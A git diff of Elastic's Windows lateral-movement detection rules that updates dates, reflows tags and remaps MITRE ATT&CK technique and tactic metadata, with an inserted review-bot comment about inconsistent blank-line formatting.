@@ -84,36 +84,36 @@ sequence by host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.003" -name = "Distributed Component Object Model" -reference = "https://attack.mitre.org/techniques/T1021/003/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml index 99d6bbb8067..b3becd3a64d 100644 --- a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml +++ b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -60,15 +60,7 @@ references = ["https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round- risk_score = 47 rule_id = "8f919d4b-a5af-47ca-a594-6be59cd924a4" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -85,19 +77,36 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" + +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.003" name = "Distributed Component Object Model" reference = "https://attack.mitre.org/techniques/T1021/003/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml b/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml index 6ddfe3c7e4b..b5ac7330e7f 100644 --- a/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml 
+++ b/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/22" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -91,31 +91,26 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.002" -name = "SMB/Windows Admin Shares" -reference = "https://attack.mitre.org/techniques/T1021/002/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/lateral_movement_executable_tool_transfer_smb.toml b/rules/windows/lateral_movement_executable_tool_transfer_smb.toml index c2c614f4ad2..ba70c4d0f18 100644 --- a/rules/windows/lateral_movement_executable_tool_transfer_smb.toml +++ b/rules/windows/lateral_movement_executable_tool_transfer_smb.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -87,24 +87,13 @@ sequence by host.id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.002" -name = "SMB/Windows Admin Shares" -reference = "https://attack.mitre.org/techniques/T1021/002/" - [[rule.threat.technique]] id = "T1570" name = "Lateral Tool Transfer" reference = "https://attack.mitre.org/techniques/T1570/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml index 9f04832e1d8..e45c278391a 100644 --- a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml +++ b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -145,19 +145,23 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_incoming_wmi.toml b/rules/windows/lateral_movement_incoming_wmi.toml index 8dbb6d82a42..9a228e246ec 100644 --- a/rules/windows/lateral_movement_incoming_wmi.toml 
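Review bot: The added `[[rule.threat.technique]]` for T1570 in the `lateral_movement_execution_via_file_shares_sequence.toml` hunk is placed directly after the preceding sub-technique's `reference` line and directly before `[rule.threat.tactic]`, while the first hunk of this chunk separates every threat table with an explicit added blank line. The same tight packing appears in the `lateral_movement_remote_file_copy_hidden_share.toml`, `lateral_movement_remote_service_installed_winlog.toml` and `lateral_movement_via_startup_folder_rdp_smb.toml` hunks, the last of which adds blank lines before some tables but not before the newly inserted T1021.002 and T1570 ones. Blank context lines may have been lost in this rendering, so this is only worth acting on if the files look the same locally; if they are produced by a formatter, re-running it should make the layout uniform.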
+++ b/rules/windows/lateral_movement_incoming_wmi.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/15" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/05/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,15 +57,7 @@ Windows Management Instrumentation (WMI) is a core Windows feature enabling remo risk_score = 47 rule_id = "f3475224-b179-4f78-8877-c2bd64c26b88" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -99,26 +91,31 @@ sequence by host.id with maxspan = 20s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" 
diff --git a/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml b/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml index 3352383ebb2..65c6a7dbcea 100644 --- a/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml +++ b/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/02" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,21 +62,7 @@ WebDav and hidden remote shares facilitate file sharing and collaboration across risk_score = 47 rule_id = "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Lateral Movement", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -94,58 +80,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1087" -name = "Account Discovery" -reference = "https://attack.mitre.org/techniques/T1087/" -[[rule.threat.technique.subtechnique]] -id = "T1087.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1087/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1087.002" -name = "Domain Account" -reference = "https://attack.mitre.org/techniques/T1087/002/" - - - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/lateral_movement_powershell_remoting_target.toml b/rules/windows/lateral_movement_powershell_remoting_target.toml index 39f0f961dc7..c3800a224ff 100644 --- a/rules/windows/lateral_movement_powershell_remoting_target.toml +++ b/rules/windows/lateral_movement_powershell_remoting_target.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/24" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,17 +68,7 @@ references = [ risk_score = 47 rule_id = "2772264c-6fb9-4d9d-9014-b416eed21254" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -92,36 +82,18 @@ sequence by host.id with maxspan = 30s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.006" name = "Windows Remote Management" reference = "https://attack.mitre.org/techniques/T1021/006/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/lateral_movement_rdp_enabled_registry.toml b/rules/windows/lateral_movement_rdp_enabled_registry.toml index 76936f15511..f3703e06da7 100644 
--- a/rules/windows/lateral_movement_rdp_enabled_registry.toml +++ b/rules/windows/lateral_movement_rdp_enabled_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/25" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -102,31 +102,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.001" name = "Remote Desktop Protocol" reference = "https://attack.mitre.org/techniques/T1021/001/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml index 197d4339c52..72f7f70f5c2 100644 --- a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml +++ b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/04" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -90,19 +90,13 @@ process where host.os.type == "windows" and event.type == "start" and user.id != [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.002" -name = "SMB/Windows Admin Shares" -reference = "https://attack.mitre.org/techniques/T1021/002/" - +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_remote_service_installed_winlog.toml b/rules/windows/lateral_movement_remote_service_installed_winlog.toml index 374035f3dfd..c460493bac4 100644 --- a/rules/windows/lateral_movement_remote_service_installed_winlog.toml +++ b/rules/windows/lateral_movement_remote_service_installed_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -101,31 +101,36 @@ sequence by winlog.logon.id, winlog.computer_name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/lateral_movement_remote_services.toml b/rules/windows/lateral_movement_remote_services.toml index 6409bf739d8..b7e54f55c06 100644 --- a/rules/windows/lateral_movement_remote_services.toml +++ b/rules/windows/lateral_movement_remote_services.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/16" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -107,15 +107,7 @@ references = [ risk_score = 47 rule_id = "aa9a274d-6b53-424d-ac5e-cb8ca4251650" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"] type = "eql" query = ''' @@ -161,14 +153,31 @@ sequence with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_remote_task_creation_winlog.toml b/rules/windows/lateral_movement_remote_task_creation_winlog.toml index 43c46a6440b..fd0ce3a7261 100644 --- a/rules/windows/lateral_movement_remote_task_creation_winlog.toml +++ b/rules/windows/lateral_movement_remote_task_creation_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -44,14 +44,7 @@ note = """## Triage and analysis risk_score = 47 rule_id = "9c865691-5599-447a-bac9-b3f2df5f9a9d" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -63,31 +56,49 @@ iam where host.os.type == "windows" and event.action == "scheduled-task-created" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" 
diff --git a/rules/windows/lateral_movement_scheduled_task_target.toml b/rules/windows/lateral_movement_scheduled_task_target.toml index 53d7fe1e840..9f0d96a262a 100644 --- a/rules/windows/lateral_movement_scheduled_task_target.toml +++ b/rules/windows/lateral_movement_scheduled_task_target.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/08" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -50,16 +50,7 @@ references = ["https://www.elastic.co/security-labs/hunting-for-lateral-movement risk_score = 47 rule_id = "954ee7c8-5437-49ae-b2d6-2960883898e9" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne"] type = "eql" query = ''' 
@@ -77,31 +68,31 @@ sequence by host.id, process.entity_id with maxspan = 1m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/lateral_movement_unusual_dns_service_children.toml b/rules/windows/lateral_movement_unusual_dns_service_children.toml index f9f1e18e1ff..ff217f183a0 100644 --- a/rules/windows/lateral_movement_unusual_dns_service_children.toml +++ b/rules/windows/lateral_movement_unusual_dns_service_children.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -77,21 +77,7 @@ references = [ risk_score = 73 rule_id = "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -111,14 +97,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml b/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml index d7b316d6ed2..a07a9bf1cf7 100644 --- a/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml 
+++ b/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/10/06" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,17 +54,7 @@ references = [ risk_score = 47 rule_id = "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Endgame", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -77,18 +67,16 @@ event.category : "file" and host.os.type : "windows" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["file.path", "host.id"] diff --git a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml index a74ff41d148..0c2fd0e28c6 100644 --- a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml +++ b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml 
